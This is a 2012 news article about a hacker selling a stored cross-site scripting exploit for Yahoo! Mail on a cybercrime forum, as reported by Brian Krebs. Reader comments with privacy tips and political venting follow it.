If You Have a Yahoo! Email Account and Value Your Privacy, You Will Want to Read This
A hacker is capitalizing on a Yahoo! flaw that could allow email accounts to become compromised and could trick users into clicking on malicious websites. But criminal hackers will have to pay to obtain details about how to conduct this hack. The cost: $700.
Brian Krebs on his blog Krebs on Security reported last week that an Egyptian hacker was offering this deal on an “exclusive cybercrime forum” called Darkode. The hack itself steals cookies, which Krebs explains leads hackers into their target’s account where they can send or read emails. Here’s how the hacker going by “The Hell” advertised his exploit, according to Krebs:
“I’m selling Yahoo stored xss that steal Yahoo emails cookies and works on ALL browsers. And you don’t need to bypass IE or Chrome xss filter as it do that itself because it’s stored xss. Prices around for such exploit is $1,100 – $1,500, while I offer it here for $700. Will sell only to trusted people cuz I don’t want it to be patched soon!”
Screenshot from the hacker’s video demo of the exploit. (Image: YouTube screenshot)
Krebs explains more about how the hack works:
In a typical XSS attack, an attacker sends a malicious link to an unsuspecting user; if the user clicks the link, the script is executed, and can access cookies, session tokens or other sensitive information retained by the browser and used with that site. These scripts can even rewrite the content of the HTML page.
“The Hell” also posted a video to show how it works, which Krebs reproduced and posted on YouTube:
Krebs writes that he contacted Yahoo! to alert them of the problem and was told the vulnerability will be relatively easy to fix.
“Fixing it is easy, most XSS are corrected by simple code change,” Ramses Martinez, director of Yahoo! security, said to Krebs. “Once we figure out the offending URL we can have new code deployed in a few hours at most.”
Until that URL is identified, Krebs noted that the vulnerability serves to remind users to be careful when clicking on links from strangers or that are in odd messages.
Read more details about the exploit in Krebs post here.
(H/T: SlashGear)
In CONTROL, Glenn Beck presents a passionate, fact-based case for guns that reveals why gun control isn’t really about controlling guns at all; it’s about controlling us. Find out more HERE.
Popular Stories
S.E. Cupp vs. Michael Moore on Guns: ‘I Just Happen to Be Informed’ 424 Comments
Report: Hofstra Student Was Shot, Killed by Cop Trying To Rescue Her 341 Comments
Sarah Palin Posts Pic of Alaska Snow: ‘Global Warming My Gluteus Maximus’ 338 Comments
Charles Krauthammer: IRS Scandal Could Be a ‘Fatal Problem’ for Obama 307 Comments
Obama Suggests IRS, Benghazi, AP Phone Scandal Are Just ‘Politics’ 236 Comments
Faith
-
Congressman: IRS Demanded to Know Content of Pro-Life Group's Prayers
Read More
-
You Criticized Obama: Famed Christian Radio Host Alleges Outrageous IRS Intimidation
175 Comments
-
Network Releases Statement on Pat Robertson's Controversial Advice to Cheated-On Women
159 Comments
-
'Blasphemy': Prominent Faith Leader Calls Obama Out Over His 'God Bless You' During Planned Parenthood Speech
195 Comments
-
Graphic New Details About Gosnell's Filthy and Flea-Ridden Home and Clinic Emerge: 'The Smells Were Just Unbearable'
Read More
Business
- This Map Shows the 'Riskiest' Places in the World 103 Comments
-
Krauthammer's Impressed With Obama's IRS Answers: He Makes Bill Clinton's Parsing Look Unsophisticated
Read More
-
Congressman: IRS Demanded to Know Content of Pro-Life Group's Prayers
Read More
- America off Limits: Soviet Tourists Were Banned from Visiting These Areas During the Cold War Read More
-
These Are the 4 Most Important Takeaways from Today's IRS Hearing
156 Comments
Technology
-
Woman Who Lost All Limbs to Flesh-Eating Bacteria Gets $200K Bionic Arms
Read More
-
Why Are These Zoo Keepers Baffled by This Anteaterâs Babies?
Read More
-
Largest Lunar Explosion in NASA History Caught on Video
123 Comments
-
Ever Wonder How It'd Look to Have Your Face Eaten by a Bear? Here's Your Answer
Read More
-
New Energy Secretary Named With Unanimous Confirmation
153 Comments
Submitting your tip... please wait!
Comments (58)
Insert Clever Username Here
Posted on November 27, 2012 at 5:27pmit’s called clickjacking, and it’s been around almost as long as clicking. sad that people are so technologically illiterate that rudimentary script kiddie tricks are considered “hacking”.
Report this comment
gosutag
Posted on November 27, 2012 at 6:14pmWhat don’t understand is that once you get even a step away from a GUI common folk become extremely confused. . .Mind you, scripting isn’t even a step away from the GUI. Maybe it’s getting worse?
Report this comment
C. Schwehr
Posted on November 27, 2012 at 7:43pmI get crap like that fairly often….just don’t click on anything that you don’t recognize and you’ll be safe.
Report this comment
gapch12
Posted on November 27, 2012 at 4:32pmPeople who click onto links from within e-mail from someone they do not know, deserves to be hacked.
Report this comment
GatorBob
Posted on November 27, 2012 at 5:21pmYour statement is preposterous, inconsiderate, elitist and typical of someone that has learned a little about something, in this case e mail,
There are beginners and elderly that e mail is a great comfort to, and keeps them in contact with friends and family. Those people will learn things like not opening unknown e mail, but I doubt seriously that you knew the first time you used e mail that you knew to not open unknown e mail.
People like you that are insecure and anxious to try and make themselves look smarter than they actually are, make negative statements like you made …….to do so is ignorant and childish.
Report this comment
gosutag
Posted on November 27, 2012 at 6:15pm@GATORBOB: Thank you for the much needed dose of sanity.
Report this comment
KevINtampa
Posted on November 27, 2012 at 3:57pmThe way this article end made me chuckle a bit. Can anyone guess why?
“Until that URL is identified, Krebs noted that the vulnerability serves to remind users to be careful when clicking on links from strangers or that are in odd messages.
Read more details about the exploit in Krebs post [here].”
Report this comment
Noah_fing-whey
Posted on November 27, 2012 at 6:31pmIt asks the really stupid Internet users that Gator Snob is so worried about to click on a link. LOL
Gator Bob needs to give out his email address so people can forward questionable emails to him for review. The world is a dangerous place. If you go wondering around in the dark in a strange neighborhood you should expect problems. Clicking on a link from a stranger is the same as asking a stranger to hold your purse while you go into the toilet stall. You deserve what you get.
Report this comment
loneindividual
Posted on November 27, 2012 at 3:40pmHaving a conversation with the person who hacked you is fun.
They are full of information. Once they realize your politics, they leave you alone….most of the time.
Report this comment
Lt_Scrounge
Posted on November 27, 2012 at 7:20pmI think that if I got hold of the twits who caused my system to crash, I don’t think that they’d find it all that entertaining. Painful might be the manner in which they would describe my method of introducing them to a medieval reenactor’s idea of “hacking” involving a battle axe.
Report this comment
Delores at CH WV
Posted on November 27, 2012 at 3:11pmWell, he probably didn’t have to hack as our government is probably selling the email addresses on the world’s black market. There is no government agency that has any honor or cares about American Privacy. As the World turns . . . our new nightmare life churns towards the end because of the UN.
Report this comment
dnha14
Posted on November 27, 2012 at 1:57pmThis is why my Yahoo address is given to people who I don’t want to have my e-mail address.
Report this comment
mrmikejohnson
Posted on November 27, 2012 at 1:17pmThere are still people who click on links from unknown senders? I thought people figured out that was a bad idea around 1998.
Report this comment
DeathRattle
Posted on November 27, 2012 at 1:55pmAgreed, if folks are still foolish enough to click on mail from someone they don’t know then I guess they deserve the outcome.
Report this comment
Libermerican
Posted on November 28, 2012 at 4:55pmStupid is as stupid does.
Report this comment
independentvoteril
Posted on November 27, 2012 at 12:59pmYahoo is one of the WORST at keeping hackers from stealing.. this is epically true when it comes to your contact list.. I wiped mine out long ago and got a hotmail one for family and friends..only thing I use my Yahoo account for is to sign up at comment boards….
Report this comment
just my opinion maybe not yours
Posted on November 27, 2012 at 5:05pmHotmail is just as bad!
Report this comment
archangel72
Posted on November 27, 2012 at 11:40amI use Thunderbird email by Mozilla. It’s great and it’s simple. I use StartPage.com and Duck Duck Go as my search engine and Mozilla Firefox as my browser. Much more secure and there are tons of add ons for privacy.
Report this comment
Proud Stray Dog
Posted on November 27, 2012 at 1:04pm@NovemberTwentyseven or whatever your name is/was
Your blog sucks. STOP SPAMMING IT!!!!!!!
Report this comment
americathebankrupt
Posted on November 27, 2012 at 11:10amGo to internet options in your browser.Click on security,Advanced,Allow session cookies,Block third party cookies.
Report this comment
archangel72
Posted on November 27, 2012 at 11:38amI actually use Thunderbird email from Mozilla. Also, I search using “Startpage.com” as my primary search engine. DuckDuck Go is also another search engine that doesn’t track you.
Report this comment
AquaBuddha
Posted on November 27, 2012 at 10:42amYahoo blows anyway. I have my email there and I really hope they go bankrupt. They are just another leftwing appliance.
Report this comment
JRook
Posted on November 27, 2012 at 10:56amIf you value your privacy you will pay attention to the 22+ third party tracking cookies that are loaded by this site. Now why would a third party marketing company pay a site to load tracking cookies. As GB says often, don’t take my work for it, figure it out yourself. Particularly what it says about the company and individuals who operate the site.
Report this comment
M13
Posted on November 27, 2012 at 1:42pmOnce again jrook shows us what an idiot and a liar he is.
Report this comment
Atrum Angelis
Posted on November 27, 2012 at 2:49pmM13: While I have no idea of JROOK’s other comments which would make him a liar, there are in fact about two dozen trackers on this site. I get a warning every time I visit the site saying X amount of trackers blocked by my addon in Firefox. Most sites now a days have at least a dozen or so.
Report this comment
4theThinMan
Posted on November 27, 2012 at 3:45pmSo, stupid, why do you have your email there?
Report this comment
teawithjill
Posted on November 27, 2012 at 10:34amMaybe the Blaze should set up an e-mail service I would pay for protecting my privacy, and be with a great bunch of people??
Report this comment
dont_drive_slow_in_the_left_lane_obliviot
Posted on November 27, 2012 at 11:12amThat’s like asking for a target on your email account. every leftist hater would be hacking those servers every minute of the day. use https://duckduckgo.com for secure searching and search for “secure email services”, you will find many good choices.
Report this comment
bpodlesnik
Posted on November 27, 2012 at 11:28amI have a @reagan email and love it.
Report this comment
Topcat
Posted on November 27, 2012 at 12:39pmHere is another good secure search engine , that uses Google . To the right of search box under ” Enhanced by Google ” click on details for full story .
https://startpage.com/
https://startpage.com/eng/aboutstartpage/
Report this comment
MrKnowItAll
Posted on November 27, 2012 at 10:27amSo Much COMMON SENSE coming to Light. YET! So many still don’t get it. I feel they never will……”Nothing In LIFE is FREE!”
Report this comment
TruckerClockWhoWantsIT
Posted on November 27, 2012 at 10:24amAll Hackers should be Hung by their Gunny Sack.
Report this comment
PingPongPing
Posted on November 27, 2012 at 10:16amgood lord. I guess i better activate the email account that my internet provider is giving me.
Report this comment
EARTHWALKER
Posted on November 27, 2012 at 10:12amIfound a good email and they have free or pay email at hushmail
Report this comment
sizzlinsexybeckster
Posted on November 27, 2012 at 10:07am….. No, no, no…. this is not only about spam! They also keep track of the websites you visit – such as this one and they can find out your username here and see what you are typing to use it against you in any corrupt way they can… they can even take away your children if you say something so simple as “I like beer.” They will pretend you are an alcoholic and a wife beater even if you don’t even have a wife. These people in government we are having to deal with are monsters, liars, and just plain creepy. They keep copies of what you say and will distort your words – anything – for their reasons to perhaps “save you” and sent you to “fat camp” or shove you into the Fema camps, you know, “for your protection” or whatever the hell crap they feel like making up just for their own sadistic thrills. DO NOT use yahoo, hotmail (all free emails) ALSO… DO NOT… use those emails such as AOL or anything your internet server provides you with… I’ve already heard stories about AOL and that’s not a free service, well, perhaps “free” if you pay for their internet connection. AOL sells your personal crap as well. Yes those emails get scanned. Why can’t someone from the military “accidentally” blow up the huge storage facilities where they store our personal crap. I believe that would be the start of our own human rights revolution to be treated with respect. Hey… I’ll chip in a dollar…
Report this comment
searcher619
Posted on November 27, 2012 at 10:00amMeh… Yahoo is one of my junk email accounts. No way would I use a free email as a primary.
Report this comment
sizzlinsexybeckster
Posted on November 27, 2012 at 9:56amI have since cancelled all my yahoo accounts and advise people to sign up for Reagan.com where you are considered a person and not just cattle and they respect your privacy, don’t sell anything or be nosy idiots… well, they do sell jelly beans at their store if you want to buy some (cute!), but never sift through your account. I highly suggest to delete all your free emails YESTERDAY and sign up there because you and your privacy are much more than worth it. Other people are really careless and don’t think they have anything of importance to be stolen but they are wrong. You may also be able to get an email address at GoDaddy.com however the Reagan site uses GoDaddy….. and there’s that bonus of jelly beans! Except I always suggest just speaking to people in person and avoiding all this electrical crap. Speaking of electrical… I believe the ovens in the FEMA camps do NOT require electricity – guess they have done their homework with their timing, you know, after the electric goes out for their ” ‘estimate’ of 3 years” they will try to round us up during this time to burn, no electric so there will be no news outlet to report from – unless theBLAZE PURCHASES one of those radio stations on those ‘emergency radios’ you buy from Lehmans or Walmart…. hint, hint. Otherwise when we tune in we’ll only hear lies like they did back in Hitler’s day.
Report this comment
ArmedAndReallyPissed
Posted on November 27, 2012 at 9:52amAnytime these friggin hackers get caught, they should get life in prison without the chance of parole. Thanks for the advice about reagan.com email. Will look into it.
Report this comment
Old Ogre
Posted on November 27, 2012 at 10:37amThen you will be paying them for their crimes for life… I am starting to think prisoners have it good compared to many Americans right now, well except for the being someones bitch thing!!
Report this comment
armyofnibiru
Posted on November 27, 2012 at 12:22pmproblem is they go right into the white house and are used as weapons against U.S.
Report this comment
4theThinMan
Posted on November 27, 2012 at 3:51pmline them up and shoot them right between the eyes. As long as you pussyfoot around with criminals – they are in business. DEATH stops crime.
Report this comment
mom4times
Posted on November 27, 2012 at 9:45am@NHWINTER I only wish I could afford reagan.com right now….maybe next year
Report this comment
DivisionByZero
Posted on November 27, 2012 at 9:31amYahoo mail, gmail, and hotmail are all anti privacy. It may be a good time to dump these clowns and find a reputable email provider. Preferably a local provider that offers encrypted email and a good privacy policy. Finally, don’t put private or sensative info in an email. It is effectively recorded “forever”, and available to anyone with a supoena and an agenda.
Report this comment
B-45
Posted on November 27, 2012 at 9:16amI am sure this will be fixed soon, but by the same token, perhaps now would be a good time for everyone to find alternative e-mail sources, and ditch Yahoo and their hard-left rhetoric drivel.
Report this comment
GrayPanther
Posted on November 27, 2012 at 9:14amOMG! I have over 1,400 scam e mails in my yahoo account due to a Walmart $1,000 shopping spree offered on my Walmart receipt. Only solution; open another account with another provider like Google.
Report this comment
NHwinter
Posted on November 27, 2012 at 9:24amI recommend reagan.com, no spam, no advertisements, completely protected. It is only $40 a year I had yahoo and got so much spam and obnoxious email that I cancelled that account. Google is in the pocket of Obama.
Report this comment
ExpertShot
Posted on November 27, 2012 at 9:38amI’m with NHWINTER on this, I went with the reagan e-mail & absolutely no spam, it’s well worth the money. I still have my yahoo but only as an e-mail to sign into various sites, such as this. All my sensitive information goes to reagan.
Report this comment
csbaby
Posted on November 27, 2012 at 9:42amUse the internet provider email, the one you get with who you pay – .att.net, cox.net, etc
Report this comment
NOT A CRAZY
Posted on November 27, 2012 at 9:48amThere are easy solutions to get rid of spam on Yahoo. First whenever you get a spam email do not open any links in that email. Identify it as spam and it will be sent to a spam folder. It doesn’t take very long to get to the point were you no longer (very rare) get spam emails in your main Inbox. You should also be careful about not generating spam in the first place. Every single time you enter your email in a database for someone to contact you, you have potentially start a spam trail. I have an extra email account that I use for oddball stuff that I need an email for but that I am leary of. I utilize that email if it is something I don’t want repeated contacts with. Google is in B.O.’s pocket.
Report this comment
llotus
Posted on November 27, 2012 at 2:27pmGraypanther….I have learned to never go to a site for anything pushed by a store. Even sears pennys etc. The walmart one has to be an outright scam. Pushed by the clerks at checkout. Reagan is good. Lotus.
Report this comment
mom4times
Posted on November 27, 2012 at 9:08amoh great…….been hacked enough as it is from them
Report this comment
EARTHWALKER
Posted on November 27, 2012 at 10:11amI found a good email that is free or they have pay ones to it is called hushmail
Report this comment
Schteveo
Posted on November 27, 2012 at 7:27pmAs a retired computer type who still does work on the side, here’s your best bet on staying safe from scammers, hackers and phishermen.
NEVER, ever, EV – ER, never open ANY e-mail unless you recognize the SENDER!
Opening e-mails from unknown senders is a great way to get your computer infected, or hacked, by thieves and people who just want to be malicious. Opening e-mails from unknown senders is like opening the door on your house at 3AM, after looking through the peephole, seeing a guy wearing a ski mask and thinking, “…I wonder who that is?” Then deciding, ” Hey, it might be Ed McMahon, so I better open the door and see if I WON the $$$$!!”
Let’s face it, you’re not going to win the Bolivian National Lottery if you don’t even know WHERE Bolivia is, there is no lost relative with $50M in a Nigerian Bank that you can get for sending them $$$ for ‘fees’, and MicroSoft is NOT in business to be giving away $$$ to you for reading or sending e-mails. There are no more REAL get quick opportunities in your e-mail, than there are in your snail mail, so DON’T open anything promising you instant riches! And finally, there are sites that are especially bad for loading junk and cookies too. nroP and game sites are some of the worst offenders! Especially ones that advertise as “FREE!!”.
P.S.
to all the people who paid us to reload their computers last year, after being told NOT to do all that stuff above, but who did anyway, our mortgage company thanks
Report this comment